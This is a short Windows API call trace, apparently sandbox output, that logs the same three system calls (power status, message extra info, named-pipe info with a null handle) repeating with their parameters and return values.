	[0130.102] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.102] GetMessageExtraInfo () returned 0x0
	[0130.103] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.103] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.103] GetMessageExtraInfo () returned 0x0
	[0130.103] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.103] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.103] GetMessageExtraInfo () returned 0x0
	[0130.104] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.104] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.104] GetMessageExtraInfo () returned 0x0
	[0130.104] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.105] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.105] GetMessageExtraInfo () returned 0x0
	[0130.105] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.105] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.105] GetMessageExtraInfo () returned 0x0
	[0130.106] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.106] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.106] GetMessageExtraInfo () returned 0x0
	[0130.106] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.107] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.107] GetMessageExtraInfo () returned 0x0
	[0130.107] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.107] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.107] GetMessageExtraInfo () returned 0x0
	[0130.108] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.108] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.108] GetMessageExtraInfo () returned 0x0
	[0130.108] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.108] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.108] GetMessageExtraInfo () returned 0x0
	[0130.109] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.109] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.109] GetMessageExtraInfo () returned 0x0
	[0130.110] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.110] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.110] GetMessageExtraInfo () returned 0x0
	[0130.111] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.111] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.111] GetMessageExtraInfo () returned 0x0
	[0130.120] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.120] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.120] GetMessageExtraInfo () returned 0x0
	[0130.121] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.121] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.121] GetMessageExtraInfo () returned 0x0
	[0130.121] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.121] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.122] GetMessageExtraInfo () returned 0x0
	[0130.122] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.122] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.122] GetMessageExtraInfo () returned 0x0
	[0130.122] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.123] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.123] GetMessageExtraInfo () returned 0x0
	[0130.123] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.123] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.123] GetMessageExtraInfo () returned 0x0
	[0130.124] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.124] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.124] GetMessageExtraInfo () returned 0x0
	[0130.125] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.126] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.126] GetMessageExtraInfo () returned 0x0
	[0130.126] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.126] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.126] GetMessageExtraInfo () returned 0x0
	[0130.127] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.127] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.127] GetMessageExtraInfo () returned 0x0
	[0130.127] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.127] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.127] GetMessageExtraInfo () returned 0x0
	[0130.128] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.128] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.128] GetMessageExtraInfo () returned 0x0
	[0130.129] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.129] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.129] GetMessageExtraInfo () returned 0x0
	[0130.131] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.131] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.131] GetMessageExtraInfo () returned 0x0
	[0130.132] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.132] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.132] GetMessageExtraInfo () returned 0x0
	[0130.133] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.133] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.133] GetMessageExtraInfo () returned 0x0
	[0130.134] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.134] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.134] GetMessageExtraInfo () returned 0x0
	[0130.135] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.135] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.135] GetMessageExtraInfo () returned 0x0
	[0130.136] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.136] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.136] GetMessageExtraInfo () returned 0x0
	[0130.137] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.137] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.137] GetMessageExtraInfo () returned 0x0
	[0130.138] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.138] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.138] GetMessageExtraInfo () returned 0x0
	[0130.138] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.138] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.139] GetMessageExtraInfo () returned 0x0
	[0130.139] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.139] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.139] GetMessageExtraInfo () returned 0x0
	[0130.140] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.140] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.140] GetMessageExtraInfo () returned 0x0
	[0130.141] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.141] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.141] GetMessageExtraInfo () returned 0x0
	[0130.141] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.141] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.142] GetMessageExtraInfo () returned 0x0
	[0130.142] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.142] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.142] GetMessageExtraInfo () returned 0x0
	[0130.143] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.143] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.143] GetMessageExtraInfo () returned 0x0
	[0130.143] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.143] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.143] GetMessageExtraInfo () returned 0x0
	[0130.144] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.144] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.144] GetMessageExtraInfo () returned 0x0
	[0130.145] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.145] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.145] GetMessageExtraInfo () returned 0x0
	[0130.146] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.146] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.146] GetMessageExtraInfo () returned 0x0
	[0130.146] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.146] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.146] GetMessageExtraInfo () returned 0x0
	[0130.147] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.147] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.147] GetMessageExtraInfo () returned 0x0
	[0130.148] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.148] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.148] GetMessageExtraInfo () returned 0x0
	[0130.149] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.149] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.149] GetMessageExtraInfo () returned 0x0
	[0130.149] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.149] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.149] GetMessageExtraInfo () returned 0x0
	[0130.150] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.150] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.150] GetMessageExtraInfo () returned 0x0
	[0130.151] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.151] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.151] GetMessageExtraInfo () returned 0x0
	[0130.152] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.152] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.152] GetMessageExtraInfo () returned 0x0
	[0130.153] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.153] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.153] GetMessageExtraInfo () returned 0x0
	[0130.153] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.153] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.153] GetMessageExtraInfo () returned 0x0
	[0130.154] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.154] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.154] GetMessageExtraInfo () returned 0x0
	[0130.155] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.155] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.155] GetMessageExtraInfo () returned 0x0
	[0130.156] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.156] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.156] GetMessageExtraInfo () returned 0x0
	[0130.156] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.156] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.156] GetMessageExtraInfo () returned 0x0
	[0130.157] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.157] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.157] GetMessageExtraInfo () returned 0x0
	[0130.158] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.158] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.158] GetMessageExtraInfo () returned 0x0
	[0130.160] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.160] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.160] GetMessageExtraInfo () returned 0x0
	[0130.164] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.174] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.175] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
